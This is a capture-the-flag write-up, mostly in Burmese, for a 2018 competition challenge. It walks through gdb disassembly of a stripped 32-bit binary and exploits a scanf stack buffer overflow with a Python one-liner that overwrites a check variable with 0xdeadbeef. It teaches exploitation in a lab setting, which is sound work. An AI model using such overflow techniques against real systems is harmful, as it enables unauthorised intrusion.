ပထမဆုံး file command နဲ့ တစ်ချက်စစ်ကြည့်လိုက်မယ်
32 bit elf file ပါ။
ကျွန်တော် ပထမဆုံးလုပ်တာကတော့ binary file ကို run ကြည့်တာပါ။
ပထမ တစ်ခါ run တယ် AAAA input ထည့်ကြည်တယ် program က normal exit ဖြစ်သွားတယ်
နောက်တစ်ခါ buffer overflow ဖြစ်လောက်စေမဲ့ buffer size ကို ထည့်ကြည့်တယ်
buffer overflow ဖြစ်သွားတယ် [ Segmentation fault (core dumped) ]
buffer overflow ဖြစ်သွားတယ် ဆိုတော့ buffer offset size ကို ရှာရပါမယ်။
Ok let open with gdb,
ဒီနေရာမှာတစ်ခုသိထားရမှာက stripped binary ဖြစ်နေတာပါ။ ဒါကြောင့် function name တွေ က remove လုပ်ထားပါတယ်။
binary file က entry point ကို စရှာရပါတယ်။ ( stripped binary ဖြစ်နေတဲ့ အတွက်ကြောင့်ပါ )
Entry point: 0x8048420
ဒီလိုဆိုရင် entry point address ကို ရပါပြီ။
main function ကနေ 0x8048531 function ကို ထပ်ခေါ်ထားတာပါ။
0x8048531 ကို ထပ်ပြီး disassemble လုပ်ကြည့်ပါမယ်။
ပုံမှာ မြင်ရတဲ့အတိုင်း
mov DWORD PTR [ebp-0x4],0xdeadc0de
variable တစ်ခုကို 0xdeadc0de assign လုပ်လိုက်တယ် ။
lea eax,[ebp-0x68]
buffer size ကို 0x68 = 104 ဆိုပြီးကြေညာတယ်။
ပြီးတော့
mov DWORD PTR [esp+0x4],eax
esp+0x4 address မှာ eax pointer ကို store လုပ်လိုက်တယ်။ scanf ရဲ့ argument 1 အနေနဲ့ပေါ့
mov DWORD PTR [esp],0x8048702
ဒါကတော့ scanf ရဲ့ argument 0 ကို "%s" strings input လုပ်မယ်လို့ ကြေညာလိုက်တာပါ။
ပြီးတော့
call 0x8048410 <__isoc99_scanf@plt>
scanf() function ကိုခေါ်လိုက်တယ် ။ ဒီနေရာမှာ buffer overflow attack ကို ဖြစ်ပေါ်စေတာပါ။
နောက်ဆုံးမှာ တော့
cmp DWORD PTR [ebp-0x4],0xdeadbeef
နဲ့ compare လုပ်ပါတယ် အပေါ်မှာ တည်းက ebp-0x4 ကို 0xdeadc0de stored လုပ်ထားပြီးသား ပါ။
တကယ်လို့သာ ကျွန်တော် တို့ 0x68 buffer size ထက်ပိုတဲ့ buffer size ကို input ထည့်လိုက်မယ်ဆိုရင် ebp-0x4 ကို overwrite လုပ်လို့ရမှာဖြစ်ပါတယ်။
ဒီနေရာမှာ break point ကို နှစ်နေရာ သတ်မှတ်ပါမယ် scanf function မခေါ်ခင်နဲ့ ခေါ်ပြီးတဲ့ အချိန်။
ပထမ breakpoint ကို 0x0804858e မှာ ဒုတိယ breakpoint ကို 0x0804859a မှာ break point သတ်မှတ်ပြီး
program ကို run လိုက်ပါ့မယ်
program run ပြီးတဲ့ အချိန်မှာ တော့ ပထမ breakpoint ကို ရောက်သွားပါမယ်။
အောက်က ပုံကို ကြည့်ကြည့်ပါ။
$ebp-0x4 မှာ 0xdeadc0de ဆိုတဲ့ value ကို assign လုပ်ထားပါတယ်။
ပြီးတော့ program ကို continue လုပ်မယ်။
input ကို A*100+"BBBB" ( AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB )
ထည့်ပြီး
Enter ရိုက်လိုက်ရင် ဒုတိယ
break point ရှိတဲ့ နေရာမှာ program က pause ဖြစ်သွားပါလိမ့်မယ်။
program pause ဖြစ်သွားတဲ့ အခါမှာ
$bpx-0x4 address မှာ ဘယ် value တွေ overwrite ဖြစ်သွားလဲ ဆိုတာကို သိဖို့
x/wx $ebp-0x4
ပြီးရိုက်ကြည့်လိုက်တဲ့ အခါမှာတော့ 0x42424242
ဆိုပြီးဖြစ်နေပါပြီ 42 က တော့ B ရဲ့ hex value ဖြစ်ပါတယ်
ဒါဆိုရင်တော့ $ebp-0x4 address ကို overwrite လုပ်နိုင်ခဲ့ပါပြီ။
ပုံမှာ မြင်ရတဲ့ အတိုင်း $ebp-0x4 က 0xdeadbeef နဲ့ ညီခဲ့ရင် flag ကို ရမှာ ဖြစ်ပြီး၊ မညီခဲ့ရင်တော့
0x80485b6 ကို jump သွားမှာဖြစ်ပါတယ်။
ဒါကြောင့် ကျွန်တော် တို့က
$ebp-0x4 overwrite ဖြစ်သွားတဲ့ နေရင်မှာ 0xdeadbeef
ကို overwrite ဖြစ်အောင်လုပ်ပေးရမှာ ဆိုတော့
python -c 'print "A"*100+"\xef\xbe\xad\xde"' > exp
ဒီနေရာမှာ 0xdeadbeef အစား "\xef\xbe\xad\xde" ကိုထည့်လိုက်လဲဆိုတော့ က little-enidan ဖြစ်နေလို့ပါ။ Check Here
ပြီးတော့မှာ
gdb မှာ
r < exp
ဆိုပြီး ပြန် run ကြည့်လိုက်တဲ့ အခါမှ
အခုဆိုရင်တော့ $ebp-0x4 address ကို 0xdeadbeef overwrite လုပ်နိုင်သွားပြီ ဖြစ်ပါတယ်။
real server မှာ စမ်းကြည့်လိုက်တဲ့ အခါမှာ တော့
flag ကို ရမှာ ဖြစ်ပါတယ်
Thank For Reading
This is fifth challenge that I solved in MCSC2018.
And the first solver team of that challenge, so we got another bonus (1 point ). yay!
I want to say thank you to challenge creator.
No comments:
Post a Comment